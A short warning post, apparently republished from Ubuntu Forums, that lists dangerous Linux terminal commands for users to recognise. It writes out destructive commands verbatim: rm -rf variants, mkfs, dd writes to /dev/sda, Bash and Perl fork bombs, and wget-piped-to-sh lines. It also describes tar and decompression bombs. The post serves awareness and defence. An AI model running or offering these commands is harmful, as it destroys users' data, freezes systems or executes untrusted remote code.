Users in Ubuntu (UNIX) use a lot the Terminal window to run different commands. But some of this commands can be extremely dangerous for you system. From these commands your files can be deleted, a huge number of processes can make your system freezes or deleting all hidden entries in a directory. Is better that everybody knows this commands so I will list some of these commands below and please be careful look but don’t run.
Delete all files, delete current directory, and delete visible files in current directory. It’s quite obvious why these commands can be dangerous to execute.
rm -rf / rm -rf . rm -rf *
Another interesting one comes up when trying to delete all hidden entries in a directory (hidden entries start with a ".") You may be tempted to use:
rm -r .*
Reformat: Data on device mentioned after the mkfs command will be destroyed and replaced with a blank filesystem.
mkfs mkfs.ext3 mkfs.anything
Block device manipulation: Causes raw data to be written to a block device. Often times this will clobber the filesystem and cause total loss of data:
any_command > /dev/sda dd if=something of=/dev/sda
Forkbomb: Executes a huge number of processes until system freezes, forcing you to do a hard reset which may cause corruption, data damage, or other awful fates.
In Bourne-ish shells, like Bash:
:(){:|:&};:
In Perl
fork while fork
Tarbomb: Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or inject files into the system by guessing filenames. You should make the habit of decompressing tars inside a cleanly made directory
Decompression bomb: Someone asks you to extract an archive which appears to be a small download. In reality it’s highly compressed data and will inflate to hundreds of GB’s, filling your hard drive. You should not touch data from an untrusted source
Shellscript: Someone gives you the link to a shellscript to execute. This can contain any command he chooses — benign or malevolent. Do not execute code from people you don’t trust
wget http://some_place/some_file sh ./some_file
or
wget http://some_place/some_file -O- | sh
Compiling code: Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile OR execute the compiled code unless the source is of some well-known application, obtained from a reputable site (i.e. SourceForge, the author’s homepage, an Ubuntu address).
Via ubuntuforums by jdong and screenshot by lord_darth_vader